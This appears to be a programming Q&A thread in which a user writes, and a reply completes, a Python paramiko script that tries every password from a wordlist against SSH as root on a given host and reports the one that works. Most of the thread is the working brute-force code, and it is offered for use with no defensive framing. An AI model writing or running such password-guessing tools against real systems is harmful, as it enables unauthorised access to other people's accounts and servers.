# Python loop ssh bruteforce

Tags: python, for-loop, ssh

My idea to make python try password list even if password found, complete till the list ends.
my code works but it prints the success message 5 times before continuing the Rest

**Note**: loop made to try as much as words exists in passwords.txt in this case = 5

```
with open("passwords.txt", "r") as p:
_passwords = [line.strip() for line in p]
_retries = range(len(_passwords))
for _pass in _passwords:
    try:
        for x in _retries:
            ssh.connect(_host, username=_user, password=_pass)
            print ("Success! user: "+_user+" and pass: "+_pass)
            ssh.close()
    except (paramiko.ssh_exception.AuthenticationException) as e:
        print e
        time.sleep(1)
```

Answer (score 0):

You can add sys.exit() after ssh.close() like

```
ssh.close()
sys.exit()
```

but don't forget to import sys package like

```
import sys
```

start of your file...

Also you don't have to use two loops. It can be done in one loop, you can optimize your code.

Comment: Good but i want to complete the list anyway. crrently my output is something like

Authentication failed

Authentication failed
Authentication failed
Success!
Success!
Success!
Success!
Authentication failed
Authentication failed

So it does complete the list but prints the success message as much as the for loop goes 5 times

Answer (score 0):

Ok I've managed to do so and below is the complete code.

Please advise if this could be achieved in more elegant way but understandable for newbies

```
import sys
import time
import base64
import paramiko
import getpass


ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
_host = "192.168.1.150"
_user = "root"
_connection = None
with open("passwords.txt", "r") as p:
    _passwords = [line.strip() for line in p]
    _retries = range(len(_passwords))
    for _pass in _passwords:
        try:
            for x in _retries:
                ssh.connect(_host, username=_user, password=_pass, timeout=4)
                _connection = True
                ssh.close()
            if _connection:
                print ("Success! user: "+_user+" and pass: "+_pass)
        except (paramiko.ssh_exception.AuthenticationException) as e:
            print e
            time.sleep(1)
```